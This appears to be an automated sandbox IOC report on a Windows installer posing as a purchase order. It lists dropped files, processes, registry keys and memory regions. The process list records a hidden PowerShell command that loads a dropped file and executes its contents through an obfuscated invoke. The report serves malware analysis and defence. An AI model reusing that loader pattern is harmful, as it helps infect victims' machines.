IOC Report
PURCHASE_ORDER-IET-2195-2024.exe

loading gif

Files

File Path
Type
Category
Malicious
PURCHASE_ORDER-IET-2195-2024.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
initial sample
malicious
C:\Users\user\AppData\Local\Decentraliseringers\misdidived\Premonopolies\Kuplende.Aer
ASCII text, with very long lines (3023), with CRLF, LF line terminators
dropped
malicious
C:\Program Files (x86)\Common Files\Glued.lnk
MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
dropped
C:\Users\user\AppData\Local\Decentraliseringers\misdidived\Kommandomode.Apo
data
dropped
C:\Users\user\AppData\Local\Decentraliseringers\misdidived\Premonopolies\byrge.txt
ASCII text, with very long lines (422), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Decentraliseringers\misdidived\Premonopolies\fremfaerden.bla
data
dropped
C:\Users\user\AppData\Local\Decentraliseringers\misdidived\Premonopolies\selvstndighedstrang.bil
data
dropped
C:\Users\user\AppData\Local\Decentraliseringers\misdidived\Premonopolies\tidsskriftartiklerne.hyp
Matlab v4 mat-file (little endian) $, numeric, rows 0, columns 180
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Temp\Cloud Setting.ini
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2smg3gkx.51s.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h5zr3co5.0rl.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n14b5ga5.hcp.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sf2fdvpo.jhi.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\nse64E1.tmp
data
dropped
There are 5 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\PURCHASE_ORDER-IET-2195-2024.exe
"C:\Users\user\Desktop\PURCHASE_ORDER-IET-2195-2024.exe"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden "$Conhydrin=Get-Content -Raw 'C:\Users\user\AppData\Local\Decentraliseringers\misdidived\Premonopolies\Kuplende.Aer';$Triquetral86=$Conhydrin.SubString(52634,3);.$Triquetral86($Conhydrin)"
malicious
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\syswow64\msiexec.exe"
malicious
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\syswow64\msiexec.exe"
malicious
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\syswow64\msiexec.exe"
malicious
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\syswow64\msiexec.exe"
malicious
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\syswow64\msiexec.exe"
malicious
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\syswow64\msiexec.exe"
malicious
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\syswow64\msiexec.exe"
malicious
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\syswow64\msiexec.exe"
malicious
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\syswow64\msiexec.exe"
malicious
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\syswow64\msiexec.exe"
malicious
C:\Windows\SysWOW64\dxdiag.exe
"C:\Windows\syswow64\dxdiag.exe"
malicious
C:\Windows\SysWOW64\dxdiag.exe
"C:\Windows\syswow64\dxdiag.exe"
malicious
C:\Windows\SysWOW64\dxdiag.exe
"C:\Windows\syswow64\dxdiag.exe"
malicious
C:\Windows\SysWOW64\dxdiag.exe
"C:\Windows\syswow64\dxdiag.exe"
malicious
C:\Windows\SysWOW64\dxdiag.exe
"C:\Windows\syswow64\dxdiag.exe"
malicious
C:\Windows\SysWOW64\dxdiag.exe
"C:\Windows\syswow64\dxdiag.exe"
malicious
C:\Windows\SysWOW64\dxdiag.exe
"C:\Windows\syswow64\dxdiag.exe"
malicious
C:\Windows\SysWOW64\dxdiag.exe
"C:\Windows\syswow64\dxdiag.exe"
malicious
C:\Windows\SysWOW64\dxdiag.exe
"C:\Windows\syswow64\dxdiag.exe"
malicious
C:\Windows\SysWOW64\dxdiag.exe
"C:\Windows\syswow64\dxdiag.exe"
malicious
C:\Windows\SysWOW64\dxdiag.exe
"C:\Windows\syswow64\dxdiag.exe"
malicious
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\syswow64\msiexec.exe"
malicious
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\syswow64\msiexec.exe"
malicious
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\syswow64\msiexec.exe"
malicious
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\syswow64\msiexec.exe"
malicious
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\syswow64\msiexec.exe"
malicious
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\syswow64\msiexec.exe"
malicious
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\syswow64\msiexec.exe"
malicious
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\syswow64\msiexec.exe"
malicious
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\syswow64\msiexec.exe"
malicious
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\syswow64\msiexec.exe"
malicious
C:\Windows\SysWOW64\dxdiag.exe
"C:\Windows\syswow64\dxdiag.exe"
malicious
C:\Windows\SysWOW64\dxdiag.exe
"C:\Windows\syswow64\dxdiag.exe"
malicious
C:\Windows\SysWOW64\dxdiag.exe
"C:\Windows\syswow64\dxdiag.exe"
malicious
C:\Windows\SysWOW64\dxdiag.exe
"C:\Windows\syswow64\dxdiag.exe"
malicious
C:\Windows\SysWOW64\dxdiag.exe
"C:\Windows\syswow64\dxdiag.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 29 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://nuget.org/NuGet.exe
unknown
http://nsis.sf.net/NSIS_ErrorError
unknown
http://pesterbdd.com/images/Pester.png
unknown
https://aka.ms/pscore6lB
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://github.com/Pester/Pester
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
There are 1 hidden URLs, click here to show them.

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\smrers\Rovfisk55
Unsobering
HKEY_CURRENT_USER\subtilly\Codicillary\Diipenates
Dolt

Memdumps

Base Address
Regiontype
Protect
Malicious
AF26000
direct allocation
page execute and read and write
malicious
23E0000
heap
page read and write
82AD000
stack
page read and write
19A000
stack
page read and write
864D000
heap
page read and write
5DC1000
trusted library allocation
page read and write
77A0000
trusted library allocation
page read and write
77C0000
trusted library allocation
page read and write
77D0000
trusted library allocation
page read and write
408000
unkown
page readonly
606000
heap
page read and write
3250000
trusted library allocation
page read and write
8200000
heap
page read and write
75B0000
trusted library allocation
page read and write
7110000
heap
page read and write
4760000
trusted library allocation
page read and write
7750000
trusted library allocation
page execute and read and write
2D60000
direct allocation
page read and write
8717000
heap
page read and write
81F4000
stack
page read and write
459000
unkown
page readonly
8560000
trusted library allocation
page read and write
48CE000
stack
page read and write
851E000
stack
page read and write
638000
heap
page read and write
2DB0000
heap
page read and write
7600000
trusted library allocation
page read and write
75C7000
trusted library allocation
page read and write
218E000
stack
page read and write
459000
unkown
page readonly
5F68000
trusted library allocation
page read and write
4D8E000
stack
page read and write
53DD000
trusted library allocation
page read and write
427000
unkown
page read and write
8390000
trusted library allocation
page read and write
2A0000
direct allocation
page read and write
74A2000
heap
page read and write
88F000
stack
page read and write
4DC1000
trusted library allocation
page read and write
76CF000
stack
page read and write
5FE000
heap
page read and write
5DE9000
trusted library allocation
page read and write
7770000
trusted library allocation
page read and write
73C0000
heap
page read and write
9B26000
direct allocation
page execute and read and write
89A0000
trusted library allocation
page read and write
2C86000
heap
page read and write
8673000
heap
page read and write
2E3A000
heap
page read and write
451000
unkown
page read and write
5FF000
heap
page read and write
73B2000
heap
page read and write
47A0000
heap
page read and write
2C60000
heap
page read and write
4CCE000
stack
page read and write
774D000
stack
page read and write
2DDC000
heap
page read and write
454000
unkown
page readonly
768E000
stack
page read and write
313F000
stack
page read and write
743C000
heap
page read and write
85C0000
trusted library allocation
page read and write
435000
unkown
page read and write
77E0000
trusted library allocation
page read and write
51E000
stack
page read and write
73A4000
heap
page read and write
879E000
heap
page read and write
8614000
heap
page read and write
30000
direct allocation
page read and write
40A000
unkown
page write copy
34EC000
stack
page read and write
4750000
trusted library allocation
page read and write
2130000
heap
page read and write
84D0000
trusted library allocation
page read and write
9030000
trusted library allocation
page execute and read and write
4F17000
trusted library allocation
page read and write
8260000
heap
page read and write
8300000
trusted library allocation
page execute and read and write
8210000
trusted library allocation
page execute and read and write
8641000
heap
page read and write
8820000
trusted library allocation
page execute and read and write
8567000
trusted library allocation
page read and write
856B000
trusted library allocation
page read and write
8345000
trusted library allocation
page read and write
8570000
trusted library allocation
page read and write
408000
unkown
page readonly
8812000
trusted library allocation
page read and write
770E000
stack
page read and write
7380000
heap
page read and write
488C000
stack
page read and write
4700000
trusted library section
page read and write
786C000
stack
page read and write
237F000
stack
page read and write
47A9000
heap
page read and write
623000
heap
page read and write
7790000
trusted library allocation
page read and write
61D000
heap
page read and write
9060000
direct allocation
page execute and read and write
431000
unkown
page read and write
4C8E000
stack
page read and write
75D0000
trusted library allocation
page read and write
50000
direct allocation
page read and write
57E8000
trusted library allocation
page read and write
98000
stack
page read and write
4765000
trusted library allocation
page execute and read and write
295C000
stack
page read and write
57FE000
trusted library allocation
page read and write
10000
direct allocation
page read and write
5F58000
trusted library allocation
page read and write
75E0000
trusted library allocation
page read and write
606000
heap
page read and write
2D80000
direct allocation
page read and write
401000
unkown
page execute read
7800000
trusted library allocation
page read and write
89B0000
trusted library allocation
page read and write
9050000
direct allocation
page execute and read and write
5F6D000
trusted library allocation
page read and write
5C8000
heap
page read and write
473D000
trusted library allocation
page execute and read and write
863D000
heap
page read and write
2C50000
direct allocation
page read and write
7F028000
trusted library allocation
page execute and read and write
638000
heap
page read and write
400000
direct allocation
page read and write
82F0000
heap
page read and write
30C0000
heap
page read and write
282F000
stack
page read and write
98F000
stack
page read and write
8630000
heap
page read and write
2260000
heap
page read and write
8830000
trusted library allocation
page execute and read and write
6E50000
direct allocation
page read and write
4838000
trusted library allocation
page read and write
8691000
heap
page read and write
30E0000
heap
page read and write
7640000
trusted library allocation
page read and write
2DE8000
heap
page read and write
48D0000
heap
page read and write
B926000
direct allocation
page execute and read and write
8612000
heap
page read and write
47EE000
stack
page read and write
422000
unkown
page read and write
2D70000
direct allocation
page read and write
2C20000
direct allocation
page read and write
30E8000
heap
page read and write
61D000
heap
page read and write
575000
heap
page read and write
21EE000
stack
page read and write
2C80000
heap
page read and write
4749000
trusted library allocation
page read and write
4790000
heap
page readonly
53DB000
trusted library allocation
page read and write
23E4000
heap
page read and write
73F2000
heap
page read and write
6DFD000
stack
page read and write
A526000
direct allocation
page execute and read and write
84D5000
trusted library allocation
page read and write
23BE000
stack
page read and write
8649000
heap
page read and write
7120000
heap
page read and write
570000
heap
page read and write
5FEA000
trusted library allocation
page read and write
37B0000
trusted library allocation
page read and write
2850000
heap
page read and write
8230000
trusted library allocation
page read and write
602000
heap
page read and write
75F0000
trusted library allocation
page read and write
4780000
trusted library allocation
page read and write
8724000
heap
page read and write
8370000
trusted library allocation
page read and write
8720000
heap
page read and write
77B0000
trusted library allocation
page read and write
4A6000
unkown
page readonly
4E24000
trusted library allocation
page read and write
5A0000
heap
page read and write
482E000
stack
page read and write
4740000
trusted library allocation
page read and write
23C0000
heap
page read and write
3250000
trusted library allocation
page read and write
33AE000
stack
page read and write
4733000
trusted library allocation
page execute and read and write
34AF000
stack
page read and write
8754000
heap
page read and write
85B0000
trusted library allocation
page read and write
42F000
unkown
page read and write
7F010000
trusted library allocation
page execute and read and write
D726000
direct allocation
page execute and read and write
7760000
trusted library allocation
page read and write
5C0000
heap
page read and write
602000
heap
page read and write
733E000
stack
page read and write
6E60000
direct allocation
page read and write
2837000
heap
page read and write
89C0000
heap
page read and write
CD26000
direct allocation
page execute and read and write
2E4C000
heap
page read and write
86FA000
heap
page read and write
4DB0000
heap
page execute and read and write
48D7000
heap
page read and write
454000
unkown
page readonly
2DB8000
heap
page read and write
2C40000
direct allocation
page read and write
4C30000
trusted library allocation
page read and write
494000
unkown
page readonly
42B000
unkown
page read and write
737E000
stack
page read and write
4710000
trusted library section
page read and write
4734000
trusted library allocation
page read and write
20000
direct allocation
page read and write
82EF000
stack
page read and write
35ED000
stack
page read and write
4D0000
heap
page read and write
9126000
direct allocation
page execute and read and write
9040000
trusted library allocation
page execute and read and write
855E000
stack
page read and write
2998000
stack
page read and write
2C30000
direct allocation
page read and write
6F45000
heap
page execute and read and write
400000
unkown
page readonly
5A5000
heap
page read and write
579000
heap
page read and write
7780000
trusted library allocation
page read and write
8645000
heap
page read and write
56E000
stack
page read and write
2C10000
heap
page read and write
8707000
heap
page read and write
8778000
heap
page read and write
85A0000
trusted library allocation
page read and write
7820000
trusted library allocation
page read and write
4730000
trusted library allocation
page read and write
2E46000
heap
page read and write
75A0000
heap
page execute and read and write
2270000
heap
page read and write
400000
unkown
page readonly
7810000
trusted library allocation
page read and write
4A6000
unkown
page readonly
6F40000
heap
page execute and read and write
8380000
trusted library allocation
page read and write
401000
unkown
page execute read
83A0000
trusted library allocation
page read and write
77F0000
trusted library allocation
page read and write
742E000
heap
page read and write
8618000
heap
page read and write
5E29000
trusted library allocation
page read and write
8610000
heap
page read and write
73D0000
heap
page read and write
494000
unkown
page readonly
4720000
trusted library allocation
page read and write
874A000
heap
page read and write
75C0000
trusted library allocation
page read and write
2B0000
direct allocation
page read and write
520000
heap
page read and write
C326000
direct allocation
page execute and read and write
8850000
trusted library allocation
page read and write
5F50000
trusted library allocation
page read and write
8220000
trusted library allocation
page read and write
86A1000
heap
page read and write
40A000
unkown
page read and write
4C20000
trusted library allocation
page execute and read and write
8639000
heap
page read and write
475A000
trusted library allocation
page execute and read and write
4762000
trusted library allocation
page read and write
There are 252 hidden memdumps, click here to show them.